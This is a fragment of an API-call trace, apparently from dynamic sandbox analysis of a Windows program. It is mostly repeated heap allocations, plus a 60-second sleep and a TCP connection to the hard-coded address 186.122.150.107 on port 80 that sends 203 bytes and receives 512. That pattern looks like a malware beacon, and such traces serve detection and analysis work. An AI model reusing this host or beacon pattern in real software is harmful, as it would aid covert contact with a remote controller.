returned 0x277c058 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x277d3c0 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x27790e8 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2779310 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2779538 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x277dc60 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x277de88 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f5cd8 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f4ea0 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f4a90 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f4c98 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f7b50 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f4478 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f6d18 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f56c0 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f4068 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f7330 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f4888 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f58c8 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f62f0 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f54b8 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f50a8 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x27f7948 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2735c58 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2736a20 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27377e8 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2736e10 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27381c0 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2737008 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2739378 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2735670 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2735868 [0239.721] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2803288 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2801ae8 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2802aa8 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x28016f8 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2800150 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2800738 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2803678 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27bf298 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27bf668 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27bfff0 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27c18b8 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27bfc20 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27c0790 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27bf0b0 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27c0b60 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27c1118 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27be910 [0239.722] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27beaf8 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27c01d8 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27beec8 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27c2240 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27c2058 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27c1c88 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x279ad90 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2798a88 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2799b20 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2798c60 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2799010 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2798e38 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2799ed0 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x279a458 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x279c760 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x279c3b0 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x279c938 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x279c1d8 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x279c588 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2796958 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2796d08 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2797468 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273e7a0 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2740258 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273e968 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273ecf8 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273d078 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273f5e0 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273d408 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273dcf0 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273eec0 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273fd00 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273d960 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273f088 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273db28 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x27405e8 [0239.723] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273f250 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2740090 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a28b0 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a1e60 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a2540 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a0650 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a15c8 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a1258 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a1780 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a3b98 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a39e0 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a40c0 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a3f08 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a3d50 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a4278 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a4430 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a47a0 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x27a45e8 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2763638 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275d628 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275e1c0 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275e018 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275e860 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275bef8 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275ea08 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275dcc8 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275ef00 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275bba8 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275ed58 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275ebb0 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275c598 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275d7d0 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275bd50 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275cf88 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a7090 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a7d50 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a6ef8 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a7558 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a5a40 [0239.724] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a58a8 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a4d80 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a5bd8 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a76f0 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a5d70 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a7888 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a7228 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a6bc8 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a6898 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a7a20 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x27a5248 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2746410 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2745338 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2746720 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2744880 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2745c68 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2746100 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2747670 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2746bb8 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2747360 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x27477f8 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2745ae0 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x27471d8 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2744a08 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2746598 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2745648 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2744d18 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b2878 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b4a40 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b32c0 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b4170 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b2ce0 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b3438 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b42e8 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b29f0 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b38a0 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b3d08 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b2b68 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b4750 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b2fd0 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b3ff8 [0239.725] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b45d8 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x27b48c8 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c5378 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c2ee8 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c3cf8 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c46d0 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c5648 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c57b0 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c3488 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c35f0 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c2c18 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c3758 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c2d80 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c3e60 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c31b8 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c5210 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c4298 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x27c3fc8 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26eff48 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ef9e8 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ef1d8 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ef488 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f0cb8 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ef5e0 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f0e10 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ef738 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26ef890 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f08b0 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f01f8 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26efdf0 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f0f68 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f10c0 [0239.726] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2811268 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x2812bf0 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27ce718 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27ce9a8 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27ce340 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cfa50 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cf530 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27ce860 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cd900 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27ce5d0 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cec38 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cf3e8 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cf7c0 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27ced80 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cfce0 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cde20 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cf908 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x27cda48 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26fa8f8 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26fa550 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26f9cc8 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26f9b90 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26fb3f0 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26f97e8 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26fa7c0 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26fb180 [0239.727] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26f8f60 [0239.728] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26f9098 [0239.728] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26f91d0 [0239.732] Sleep (dwMilliseconds=0xea60) [0249.747] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0249.747] socket (af=2, type=1, protocol=6) returned 0x2bc [0249.748] htons (hostshort=0x50) returned 0x5000 [0249.748] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0249.748] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0249.749] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0249.749] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0249.749] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0249.749] connect (s=0x2bc, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0250.004] send (s=0x2bc, buf=0x19d8f8*, len=203, flags=0) returned 203 [0250.004] recv (in: s=0x2bc, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0250.271] closesocket (s=0x2bc) returned 0 [0250.272] WSACleanup () returned 0 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2786660 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2785fe8 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2789180 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2788268 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x27893a8 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2788f58 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2789a20 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x27877a0 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x27879c8 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2788490 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2788b08 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2786210 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2786ab0 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2787bf0 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2789e70 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x27886b8 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2786438 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2787e18 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x27895d0 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x278a098 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x27897f8 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2789c48 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2787350 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2787128 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2786cd8 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2787578 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x278a2c0 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2786f00 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2788040 [0250.272] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 